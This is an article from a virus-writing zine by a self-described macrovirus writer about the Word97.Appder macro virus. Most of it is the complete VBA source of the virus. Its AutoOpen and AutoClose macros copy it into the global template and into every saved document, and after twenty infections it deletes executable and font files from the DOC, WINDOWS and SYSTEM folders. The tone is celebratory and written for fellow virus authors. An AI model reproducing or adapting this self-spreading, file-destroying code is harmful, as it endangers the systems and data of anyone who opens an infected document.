Copy Link
Add to Bookmark
Report
SLAM3.015: Word97 Appder Virus Analysis by DarkSide1 [SLAM]
Word97 Appder Virus Analysis
Many people work now with M$ Office 97 which include a real VBA (Visual Basic for Applications). Other macrovirus create under M$ Word 6.0/7.0 using WordBasic and can't spread under Word 97 or Word 8.0. No problem! ;) now many macrovirus like Wazzu, Appder, Rapi, Kompu and others can run with his specific 'version' to Word 97. Of Course, many new macrovirus specific for Word 97 are ready like NightShade, Eifel, SLAM97 and more!
Word97.Appder is the macrovirus which i use like sample, you can view the code under VBA_PROJECT, it's easy to understand ;)
Firstly a short description of Appder:
- Appder contains two original macros on NORMAL.DOT: Appder, AutoClose ,but while infecting documents copies them to three macros: Appder, AutoOpen and AutoClose. AutoOpen is the same macro Appder, and infect the global macros area when a infected document is open.
- Appder creates the "NTTHNTA=value" line in the "[Microsoft Word]" section in WINWORD6.INI file and increases this value while infecting any document. When this value reaches 20, the virus try to deletes the files:
- C:\DOC\*.EXE
- C:\DOC\*.COM
- C:\WINDOWS\*.EXE
- C:\WINDOWS\SYSTEM\*.TTF
- C:\WINDOWS\SYSTEM\*.FOT
- The version for Word 6.0/7.0 has been reported in the wild during 1997.
And now the same code of Appder specific for Word 97:
================begin Word97 Appder=====================
-----------------
Macro Appder.MAIN
-----------------
'Virus - NTTHNTA
Public Sub MAIN()
Dim iMacroCount
Dim i
Dim AClose
Dim Ad
Dim sMe$
Dim sMacro$
Funyour
On Error GoTo -1: On Error GoTo Quit
iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
If WordBasic.[MacroName$](i, 0, 0) = "AutoClose" Then
AClose = -1
End If
If WordBasic.[MacroName$](i, 0, 0) = "Appder" Then
Ad = -1
End If
Next i
If Not AClose And Not Ad Then
sMe$ = WordBasic.[FileName$]()
sMacro$ = sMe$ + ":Appder"
WordBasic.MacroCopy sMacro$, "Global:Appder"
sMacro$ = sMe$ + ":AutoClose"
WordBasic.MacroCopy sMacro$, "Global:AutoClose"
End If
Quit:
End Sub
Private Sub Funyour()
Dim WOpen$
Dim sales
WOpen$ = WordBasic.[GetPrivateProfileString$]("Microsoft Word", " NTTHNTA", "WINWORD6.INI")
sales = WordBasic.Val(WOpen$) + 1
WordBasic.SetPrivateProfileString "Microsoft Word", "NTTHNTA", Str(sales), "WINWORD6.INI"
WOpen$ = WordBasic.[GetPrivateProfileString$]("Microsoft Word", "NTTHNTA", "WINWORD6.INI")
If WOpen$ = "20" Then
WordBasic.SetPrivateProfileString "Microsoft Word", "NTTHNTA", "1", "WINWORD6.INI"
WordBasic.Kill "C:\DOC\*.EXE"
WordBasic.Kill "C:\DOC\*.COM"
WordBasic.Kill "C:\WINDOWS\*.EXE"
WordBasic.Kill "C:\WINDOWS\SYSTEM\*.TTF"
WordBasic.Kill "C:\WINDOWS\SYSTEM\*.FOT"
End If
End Sub 'Funyour
--------------------
Macro AutoClose.MAIN
--------------------
' Virus - NTTHNTA
Public Sub MAIN()
Dim sMe$
Dim sTMacro$
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
On Error GoTo -1: On Error GoTo Quit
WordBasic.CurValues.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
sMe$ = WordBasic.[FileName$]()
sTMacro$ = sMe$ + ":AutoOpen"
WordBasic.MacroCopy "Global:Appder", sTMacro$
sTMacro$ = sMe$ + ":Appder"
WordBasic.MacroCopy "Global:Appder", sTMacro$
sTMacro$ = sMe$ + ":AutoClose"
WordBasic.MacroCopy "Global:AutoClose", sTMacro$
WordBasic.FileSaveAs dlg
GoTo Done
Quit:
If Err.Number <> 102 Then
WordBasic.FileSaveAs dlg
End If
Done:
End Sub
==================end Word97 Appder=====================
Comment Finally:
- Now any antivirus find macrovirus for Word 97.
- Before, under Word 6.0/7.0 you need write the WordBasic code of your macrovirus in your specific same language of Word version (Spanish, English, French,German...) now the language code of VBA for Word 97 is the same for other languages versions. ;-) Well, i have the Spanish Version and saw the same code like English Version. Of course, Word 97 have the same specific macro names for your language version.
DarkSide1 [SLAM]
MacroVirus Writer/Research
